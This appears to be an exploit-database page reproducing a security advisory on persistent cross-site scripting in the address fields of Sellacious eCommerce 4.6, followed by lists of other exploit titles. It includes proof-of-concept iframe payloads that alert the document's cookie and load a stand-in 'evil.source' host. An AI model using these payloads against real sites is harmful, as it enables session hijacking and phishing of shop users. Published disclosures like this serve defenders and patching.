Search for hundreds of thousands of exploits

"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting"

Author

Exploit author

Vulnerability-Lab

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-13

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vendor Homepage: https://www.sellacious.com
# Version: 4.6
# Software Link:  https://www.sellacious.com/free-open-source-ecommerce-software

Document Title:
===============
Sellacious eCommerce - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2226


Common Vulnerability Scoring System:
====================================
4.6


Product & Service Introduction:
===============================
https://www.sellacious.com/free-open-source-ecommerce-software


Vulnerability Disclosure Timeline:
==================================
2020-05-08: Public Disclosure (Vulnerability Laboratory)


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Sellacious eCommerce Shop CMS (2020 Q1).
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.

The cross site web vulnerabilities are located in the all the adress
input fields of the `Manage Your Addresses` module.
Remote attackers are able to register a low privilege user account to
inject own malicious script code to the adress
information page. The execution of the script code occurs each time the
adress information is used in the web ui of
the ecommerce application. The request method to inject is POST and the
attack vector is persistent on the application-side.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Your Addresses

Vulnerable Input(s):
[+] Full name
[+] First name
[+] Middle name
[+] Last name
[+] Company
[+] PO Box
[+] Address
[+] Landmark

Affected(s):
[+] index.php/manage-your-addresses
[+] Backend user adress information listing


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with user account and low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


PoC: Exploitation
<iframe src="evil.source" onload=alert(document.cookie)>
<iframe src="evil.source" onload=alert(document.domain)>


PoC: Vulnerable Source
<div class="addresses-container">
<div class="address-heading">
<h2>Your addresses
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
<i class="fa fa-plus"></i> <span class="add-address-text">Add New
Address</span></a></h2></div>
<div id="addresses" class="cart-aio ctech-text-center">
<div id="address-editor">
<ul id="address-items" data-original-title="" title=""> <li
class="address-item" id="address-item-9"> <div class="ctech-float-right
address-action">
<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default
hasTooltip remove-address" data-placement="bottom" data-id="9" title=""
data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a
href="#address-form-9" role="button" data-toggle="ctech-modal"
data-placement="bottom"
class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title=""
data-original-title="Edit"><i class="fa fa-edit"></i></a> </div>
<div class="address-content"> <span class="address_name">>"<iframe
src="evil.source"></span> <span class="address_company">>"<iframe
src="evil.source"></span>
<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
<span class="address_address has-comma">>"<iframe src="evil.source"></span>
<span class="address_landmark has-comma">>"<iframe
src="evil.source"></span> <span class="address_country">United
States</span>
<div class="cart_address_box w100p"> <div class="cart_address_buttons">
</div> </div> </div> </li> <li class="address-item odd-address-item">
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="btn-new-address"><i class="fa fa-plus"></i></a> </li>
</iframe></span></div></li></ul>
<div class="ctech-wrapper">
</div><div class="ctech-clearfix"></div>
</div><div class="ctech-clearfix"></div>
</div></div>


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-13"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-13"Tryton 5.4 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-11"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-11"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-05-07"Draytek VigorAP 1000C - Persistent Cross-Site Scripting"webappshardwareVulnerability-Lab
2020-05-05"Fishing Reservation System 7.5 - 'uid' SQL Injection"webappsphpVulnerability-Lab
2020-05-01"Super Backup 2.0.5 for iOS - Directory Traversal"webappsiosVulnerability-Lab
2020-05-01"HardDrive 2.1 for iOS - Arbitrary File Upload"webappsiosVulnerability-Lab
2020-04-29"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)"localwindowsVulnerability-Lab
2020-04-29"Easy Transfer 1.7 for iOS - Directory Traversal"webappsiosVulnerability-Lab
2020-04-23"Sky File 2.1.0 iOS - Directory Traversal"webappsiosVulnerability-Lab
2020-04-22"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting"webappslinuxVulnerability-Lab
2020-04-20"Fork CMS 5.8.0 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-04-17"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection"webappsphpVulnerability-Lab
2020-04-17"Playable 9.18 iOS - Persistent Cross-Site Scripting"webappsiosVulnerability-Lab
2020-04-15"AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting"webappsiosVulnerability-Lab
2020-04-15"File Transfer iFamily 2.1 - Directory Traversal"webappsiosVulnerability-Lab
2020-04-15"SeedDMS 5.1.18 - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-04-15"Macs Framework 1.14f CMS - Persistent Cross-Site Scripting"webappsphpVulnerability-Lab
2020-04-15"SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting"webappsiosVulnerability-Lab
2019-12-19"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation"webappshardwareVulnerability-Lab
2019-08-14"TortoiseSVN 1.12.1 - Remote Code Execution"webappswindowsVulnerability-Lab
2018-01-23"CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection"webappsphpVulnerability-Lab
2018-01-21"Shopware 5.2.5/5.3 - Cross-Site Scripting"webappsjsonVulnerability-Lab
2018-01-21"CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities"webappsphpVulnerability-Lab
2018-01-15"Flash Operator Panel 2.31.03 - Command Execution"webappsphpVulnerability-Lab
2018-01-12"Kentico CMS 11.0 - Buffer Overflow"doswindowsVulnerability-Lab
2018-01-08"SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities"webappshardwareVulnerability-Lab
2018-01-08"Photos in Wifi 1.0.1 - Path Traversal"webappsiosVulnerability-Lab
2017-09-04"CodeMeter 6.50 - Cross-Site Scripting"webappsmultipleVulnerability-Lab
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48467/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.